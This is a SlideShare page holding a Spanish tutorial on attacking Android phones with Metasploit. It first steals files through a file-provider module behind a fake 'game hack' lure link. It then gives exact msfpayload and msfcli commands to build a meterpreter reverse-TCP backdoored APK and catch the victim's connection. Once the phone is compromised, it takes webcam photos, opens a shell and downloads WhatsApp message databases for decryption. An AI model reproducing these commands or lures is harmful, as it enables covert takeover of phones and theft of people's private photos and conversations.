SlideShare una empresa de Scribd logo

Android

A
anemonax

Este documento describe cómo usar Metasploit para robar archivos de un dispositivo Android y crear una puerta trasera en un dispositivo Android. Primero, se usa el módulo auxiliary/gather/android_htmlfileprovider para robar archivos como hosts. Luego, se crea un APK infectado con meterpreter usando msfpayload para tomar el control remoto del dispositivo a través de una conexión reversa TCP. Una vez instalado el APK, se puede usar meterpreter para tomar fotos, ver información del sistema y descargar archivos como las conversaciones de What

Tecnología
1 de 9
Descargar para leer sin conexión
1
2
3
4
5
6
7
8
9
PENTEST & Support Gathering en Android y Backdoor [Con Metasploit] Por J0K3$/Icebreaker Nivel de Paper = Básico Gathering: Robo de Archivo en Android [Metasploit] Hola! En esta parte del paper explicaremos como conseguir información del Android, primero de todo cargaremos metasploit, bien sea en su windows/mac/linux, bueno una vez cargado usaremos el siguiente “Auxiliar” : use auxiliary/gather/android_htmlfileprovider Ya vieron una vez cargado , pueden hacer un “show options” , si quieren , bueno ahora lo que tenemos que hacer es indicarles el archivo a robar de android, para eso os dejo acá una lista de los path de los directorios , para mi , interesantes.....
Bueno en mi casó no cogeré ninguna de esas cogeré, otras pues usare mi maquina virtual para , que no me demore mucho tiempo , pero pueden usar una de esas, por si les interesa algún directorio en especial , Ok?! Empecemos acá les dejo una foto de mi configuración y ahora les explicare punto por punto para que es cada. Bueno, expliquemos esto por partes.... Files = Esté sera el archivo que robaran de android, me explico? El path …..en mi caso será hosts. URIPATH= Le coloqué este “/” es lo que ira detrás de la ip, pueden poner algo así para la ing social, por ejemplo /HackPou ...por ejemplo ese supuesto hack para el juego y saldria así : “Ip”/HackPou SRVPORT= Al principio saldría 8080 pero para no darle el puerto ese pues la dirección quedaría así al entregársela a la víctima “ip”:8080/HackPou , pues les extrañaría aunque también hay shorten , pero lo podrían ver en la barrita de arriba al ejecutarlo...Entonces déjenlo como 80 y no se visualizara [Porque es protocolo HTTP].... Bueno le daremos la dirección que nos da para los ataques locales la de Local Ip , osease le daré esa ip haber que me muestra el exploit GO! .
Bueno, acá ven eso es la ip local , de el dispositivo atacado , y su versión de android + modelo del dispositivo ¿No está mal ? Eh ...Bueno este ataque es muy bueno , con una combinación que diré al final ….. Pero pasémonos a la otra parte del paper no? ….¿Tienen miedo? Backdoor en Android. Tomando el Control del dispositivo. [Metasploit] Bueno en esté punto dirán ! ¿Enserio? Se puede penetrar mi android, de una forma sencilla...saltándose antivirus …..Pues si, primero actualicen metasploit si llevan tiempo sin hacerlo , pues salieron algunos módulos nuevos bueno , pasemos a la acción primero dentro de la consola de metasploit colocaremos esto …. search android Bueno verán los siguientes módulos.....
O sí! Am sacado un exploit handler, y 2 payloads...mmm.... saquemos un APK infectada ¿No? Claro....bueno como creamos este apk? Pues fácil con msfpayload , yo lo creare de Meterpreter, por si no lo saben meterpreter es el “Troyano” de metasploit ,con funciones interesantes. Para crearlo abrimos una terminal y ponemos lo siguiente..... sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=”Ip local o Externa” R > “Ruta+Archivo.apk” Ejemplo: sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=192.168.1.35 R > /home/icebreaker/Escritorio/HackPou.apk Bueno , dirán si han hecho “backdoors” para metasploit , ! J0k3$ J0k3$ ! , por qué pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien escrito....Bueno una vez hecho eso, cargamos el exploit …... sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E ejemplo: sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E
Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto.... O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para ver los comandos que nos brinda Meterpreter ,para esté dispositivo.
Uo! cuantos comandos! Probemos alguno como ...”Sysinfo”..... Mmmm ! Buena información , probemos ….Webcam_Snap....Esté es para echar una foto con el teléfono infectado.....
No sé ve muy bien xD jajaj pero bueno, es la cámara de mi móvil...XD jajajajaj , y como vieron antes jajaja no es muy bueno ni nuevo...XD jajajja....Bueno probemos shell....Esté es mi comando preferido.... O sí! , que bonitos directorios del android infectado …..bueno entremos en sdcard haber que encontramos....
Oh! hemos encontrado el directorio de WhatsApp.....Salgamos y movamos con meterpreter hacia este directorio para descargarnos algo.... Bueno bueno, les explico lo que uso en la imagén para moverme....son estos 2 comandos... pwd = Es para ver en que directorio empezamos inicialmente.... cd = para avanzar o retroceder [Parar retroceder sería así :” cd .. “] entramos en alguna carpeta como podria ser Databases, y descargamos el archivo de
la database llamado : “msgstore.db.crypt” , bueno ese archivo tiene las conversaciones de whatsapp también podrían descargar imágenes...etc de todo , después de descargarlo usen algo como un whatsapp decripter y desencripten las conversaciones para leerlas...ya are un paper de como se hacen …. Saludos y que les allá servido de algo. Gracias a Pentest And Support , especialmente gracias a David Urióstegui.

Más contenido relacionado

PDF
Proof of concept: Auditando sistema con METASPLOIT
BTshell-Fran
 
PDF
Penetrar un servidor unix por el puerto 139 con metasploit
BTshell-Fran
 
PDF
Batch
alan moreno
 
DOCX
Borrar tashes
Adrian Duque Ocampo
 
PDF
Hack x crack_batch2
Juan Jose Garcia Sanchez
 
DOC
Mantenimeinto
cartonskcc
 
DOCX
Doc trashes24214
RICK RAMOS
 
DOC
librarse de un troyano (El libro del hacker capitulo 8)
HammerBlanco
 
Proof of concept: Auditando sistema con METASPLOIT
BTshell-Fran
 
Penetrar un servidor unix por el puerto 139 con metasploit
BTshell-Fran
 
Batch
alan moreno
 
Borrar tashes
Adrian Duque Ocampo
 
Hack x crack_batch2
Juan Jose Garcia Sanchez
 
Mantenimeinto
cartonskcc
 
Doc trashes24214
RICK RAMOS
 
librarse de un troyano (El libro del hacker capitulo 8)
HammerBlanco
 

La actualidad más candente (12)

PPTX
Práctica de calculadora documentada
Tochis
 
DOCX
Primero quiero que entiendas algo
Andrea Paz
 
PDF
Uso de Excepciones en JAVA
innovalabcun
 
PDF
Manual de Lenguaje Batch
Mauricio Melo
 
DOCX
Destructores
Diego Ramon Sanchez
 
PDF
Ataque kali
Francisco Javier Mejías Fernández
 
PPS
Problemas con el_ordenador
Reflexiones PowerPoint
 
PPS
Computer Problems Ra
Ulises Isaza
 
PPS
Computer Problems Ra
guestcf37ef
 
PPS
Problemas Con El Ordenador
El Ojo Kanalla .
 
PPS
PROBLEMAS CON EL PC
conillet
 
PPS
Problemas con el ordenador
centrowebs
 
Práctica de calculadora documentada
Tochis
 
Primero quiero que entiendas algo
Andrea Paz
 
Uso de Excepciones en JAVA
innovalabcun
 
Manual de Lenguaje Batch
Mauricio Melo
 
Destructores
Diego Ramon Sanchez
 
Ataque kali
Francisco Javier Mejías Fernández
 
Problemas con el_ordenador
Reflexiones PowerPoint
 
Computer Problems Ra
Ulises Isaza
 
Computer Problems Ra
guestcf37ef
 
Problemas Con El Ordenador
El Ojo Kanalla .
 
PROBLEMAS CON EL PC
conillet
 
Problemas con el ordenador
centrowebs
 
Publicidad

Similar a Android (20)

PPTX
Troyanizando y Auditando Android - HoneyCON
Matías Moreno Cárdenas
 
PPTX
Comprometiendo dispositivos con software legal - H-C0N 2018
Matías Moreno Cárdenas
 
PPT
MAITAINING ACCESS
Tensor
 
PDF
Seguridad: Backtrack2
Francesc Perez
 
PPT
Maitaining access
Tensor
 
PPTX
Escaneo de Puertos
arnoldvq16
 
PDF
Taller Android Navaja Negra 5 ED
mirojo
 
PPTX
Actualidad del malware en Android, detección y otros temas
Luis Delgado
 
PDF
Metasploit
Jose Peña
 
PDF
Ataque win xp
darlyjazmin
 
PDF
Karmetasploit - Entorno de entrenamiento de seguridad informática
Daniel
 
PDF
Pimp your Android. Rooted CON 2012.
Internet Security Auditors
 
PDF
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
Jose Gonzales
 
PDF
Network.Penetration.CGSOL
ykro
 
PPTX
CPMX5 - Hacking like a boss por Roberto Salgado
Websec México
 
PDF
Metasploit
Cristian Alejandro Rojas Quintero
 
PPTX
Presentation OWASP Day @ FIUBA.AR
Bonsai Information Security
 
PDF
Episodio de pentesting
akencito
 
PPTX
CTF Brainpan
Diego Ramírez González
 
PDF
Penetración con una Backdoor
NEGOCIOS PROPIOS
 
Troyanizando y Auditando Android - HoneyCON
Matías Moreno Cárdenas
 
Comprometiendo dispositivos con software legal - H-C0N 2018
Matías Moreno Cárdenas
 
MAITAINING ACCESS
Tensor
 
Seguridad: Backtrack2
Francesc Perez
 
Maitaining access
Tensor
 
Escaneo de Puertos
arnoldvq16
 
Taller Android Navaja Negra 5 ED
mirojo
 
Actualidad del malware en Android, detección y otros temas
Luis Delgado
 
Metasploit
Jose Peña
 
Ataque win xp
darlyjazmin
 
Karmetasploit - Entorno de entrenamiento de seguridad informática
Daniel
 
Pimp your Android. Rooted CON 2012.
Internet Security Auditors
 
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
Jose Gonzales
 
Network.Penetration.CGSOL
ykro
 
CPMX5 - Hacking like a boss por Roberto Salgado
Websec México
 
Metasploit
Cristian Alejandro Rojas Quintero
 
Presentation OWASP Day @ FIUBA.AR
Bonsai Information Security
 
Episodio de pentesting
akencito
 
CTF Brainpan
Diego Ramírez González
 
Penetración con una Backdoor
NEGOCIOS PROPIOS
 
Publicidad

Último (20)

PDF
MÓDULO DE CALOR DE GRADO DE MEDIO DE FORMACIÓN PROFESIONAL
rrdl1
 
PPT
El-Gobierno-Electrónico-En-El-Estado-Bolivia
AlanAsojonih
 
PDF
SAP Transportation Management para LSP, TM140 Col18
Libreria ERP
 
PDF
Calidad desde el Docente y la mejora continua .pdf
marioosornozetina1
 
PPTX
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
josemejiadiazfonseca
 
PDF
clase auditoria informatica 2025.........
KatherineMundaca1
 
PDF
MANUAL TECNOLOGÍA SER MINISTERIO EDUCACIÓN
CLAUDIAPATRICIASALAZ19
 
PPTX
Power Point Nicolás Carrasco (disertación Roblox).pptx
JoseCarrasco807534
 
PDF
Estrategia de apoyo tecnología miguel angel solis
edepmiguelsolis
 
PPTX
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
CarlosAndresuztes
 
PPTX
Propuesta BKP servidores con Acronis1.pptx
CarlosAndresuztes
 
PPTX
Sesion 1 de microsoft power point - Clase 1
carlosmedina2810
 
PDF
Plantilla para Diseño de Narrativas Transmedia.pdf
veronicafernandezab
 
PPT
Que son las redes de computadores y sus partes
AldamirJoseAvilaBena
 
PPTX
COMO AYUDAN LAS TIC EN LA EDUCACION SUPERIOR.pptx
ap3377309
 
PDF
Diapositiva proyecto de vida, materia catedra
mpruiz3
 
PPTX
REDES INFORMATICAS REDES INFORMATICAS.pptx
rendertecno
 
PPTX
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
jeannettehenriquezor
 
PDF
CyberOps Associate - Cisco Networking Academy
VICTOR MAESTRE RAMIREZ
 
PPTX
Presentación PASANTIAS AuditorioOO..pptx
ange127383
 
MÓDULO DE CALOR DE GRADO DE MEDIO DE FORMACIÓN PROFESIONAL
rrdl1
 
El-Gobierno-Electrónico-En-El-Estado-Bolivia
AlanAsojonih
 
SAP Transportation Management para LSP, TM140 Col18
Libreria ERP
 
Calidad desde el Docente y la mejora continua .pdf
marioosornozetina1
 
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
josemejiadiazfonseca
 
clase auditoria informatica 2025.........
KatherineMundaca1
 
MANUAL TECNOLOGÍA SER MINISTERIO EDUCACIÓN
CLAUDIAPATRICIASALAZ19
 
Power Point Nicolás Carrasco (disertación Roblox).pptx
JoseCarrasco807534
 
Estrategia de apoyo tecnología miguel angel solis
edepmiguelsolis
 
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
CarlosAndresuztes
 
Propuesta BKP servidores con Acronis1.pptx
CarlosAndresuztes
 
Sesion 1 de microsoft power point - Clase 1
carlosmedina2810
 
Plantilla para Diseño de Narrativas Transmedia.pdf
veronicafernandezab
 
Que son las redes de computadores y sus partes
AldamirJoseAvilaBena
 
COMO AYUDAN LAS TIC EN LA EDUCACION SUPERIOR.pptx
ap3377309
 
Diapositiva proyecto de vida, materia catedra
mpruiz3
 
REDES INFORMATICAS REDES INFORMATICAS.pptx
rendertecno
 
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
jeannettehenriquezor
 
CyberOps Associate - Cisco Networking Academy
VICTOR MAESTRE RAMIREZ
 
Presentación PASANTIAS AuditorioOO..pptx
ange127383
 

Android

  • 1. PENTEST & Support Gathering en Android y Backdoor [Con Metasploit] Por J0K3$/Icebreaker Nivel de Paper = Básico Gathering: Robo de Archivo en Android [Metasploit] Hola! En esta parte del paper explicaremos como conseguir información del Android, primero de todo cargaremos metasploit, bien sea en su windows/mac/linux, bueno una vez cargado usaremos el siguiente “Auxiliar” : use auxiliary/gather/android_htmlfileprovider Ya vieron una vez cargado , pueden hacer un “show options” , si quieren , bueno ahora lo que tenemos que hacer es indicarles el archivo a robar de android, para eso os dejo acá una lista de los path de los directorios , para mi , interesantes.....
  • 2. Bueno en mi casó no cogeré ninguna de esas cogeré, otras pues usare mi maquina virtual para , que no me demore mucho tiempo , pero pueden usar una de esas, por si les interesa algún directorio en especial , Ok?! Empecemos acá les dejo una foto de mi configuración y ahora les explicare punto por punto para que es cada. Bueno, expliquemos esto por partes.... Files = Esté sera el archivo que robaran de android, me explico? El path …..en mi caso será hosts. URIPATH= Le coloqué este “/” es lo que ira detrás de la ip, pueden poner algo así para la ing social, por ejemplo /HackPou ...por ejemplo ese supuesto hack para el juego y saldria así : “Ip”/HackPou SRVPORT= Al principio saldría 8080 pero para no darle el puerto ese pues la dirección quedaría así al entregársela a la víctima “ip”:8080/HackPou , pues les extrañaría aunque también hay shorten , pero lo podrían ver en la barrita de arriba al ejecutarlo...Entonces déjenlo como 80 y no se visualizara [Porque es protocolo HTTP].... Bueno le daremos la dirección que nos da para los ataques locales la de Local Ip , osease le daré esa ip haber que me muestra el exploit GO! .
  • 3. Bueno, acá ven eso es la ip local , de el dispositivo atacado , y su versión de android + modelo del dispositivo ¿No está mal ? Eh ...Bueno este ataque es muy bueno , con una combinación que diré al final ….. Pero pasémonos a la otra parte del paper no? ….¿Tienen miedo? Backdoor en Android. Tomando el Control del dispositivo. [Metasploit] Bueno en esté punto dirán ! ¿Enserio? Se puede penetrar mi android, de una forma sencilla...saltándose antivirus …..Pues si, primero actualicen metasploit si llevan tiempo sin hacerlo , pues salieron algunos módulos nuevos bueno , pasemos a la acción primero dentro de la consola de metasploit colocaremos esto …. search android Bueno verán los siguientes módulos.....
  • 4. O sí! Am sacado un exploit handler, y 2 payloads...mmm.... saquemos un APK infectada ¿No? Claro....bueno como creamos este apk? Pues fácil con msfpayload , yo lo creare de Meterpreter, por si no lo saben meterpreter es el “Troyano” de metasploit ,con funciones interesantes. Para crearlo abrimos una terminal y ponemos lo siguiente..... sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=”Ip local o Externa” R > “Ruta+Archivo.apk” Ejemplo: sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=192.168.1.35 R > /home/icebreaker/Escritorio/HackPou.apk Bueno , dirán si han hecho “backdoors” para metasploit , ! J0k3$ J0k3$ ! , por qué pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien escrito....Bueno una vez hecho eso, cargamos el exploit …... sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E ejemplo: sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E
  • 5. Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto.... O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para ver los comandos que nos brinda Meterpreter ,para esté dispositivo.
  • 6. Uo! cuantos comandos! Probemos alguno como ...”Sysinfo”..... Mmmm ! Buena información , probemos ….Webcam_Snap....Esté es para echar una foto con el teléfono infectado.....
  • 7. No sé ve muy bien xD jajaj pero bueno, es la cámara de mi móvil...XD jajajajaj , y como vieron antes jajaja no es muy bueno ni nuevo...XD jajajja....Bueno probemos shell....Esté es mi comando preferido.... O sí! , que bonitos directorios del android infectado …..bueno entremos en sdcard haber que encontramos....
  • 8. Oh! hemos encontrado el directorio de WhatsApp.....Salgamos y movamos con meterpreter hacia este directorio para descargarnos algo.... Bueno bueno, les explico lo que uso en la imagén para moverme....son estos 2 comandos... pwd = Es para ver en que directorio empezamos inicialmente.... cd = para avanzar o retroceder [Parar retroceder sería así :” cd .. “] entramos en alguna carpeta como podria ser Databases, y descargamos el archivo de
  • 9. la database llamado : “msgstore.db.crypt” , bueno ese archivo tiene las conversaciones de whatsapp también podrían descargar imágenes...etc de todo , después de descargarlo usen algo como un whatsapp decripter y desencripten las conversaciones para leerlas...ya are un paper de como se hacen …. Saludos y que les allá servido de algo. Gracias a Pentest And Support , especialmente gracias a David Urióstegui.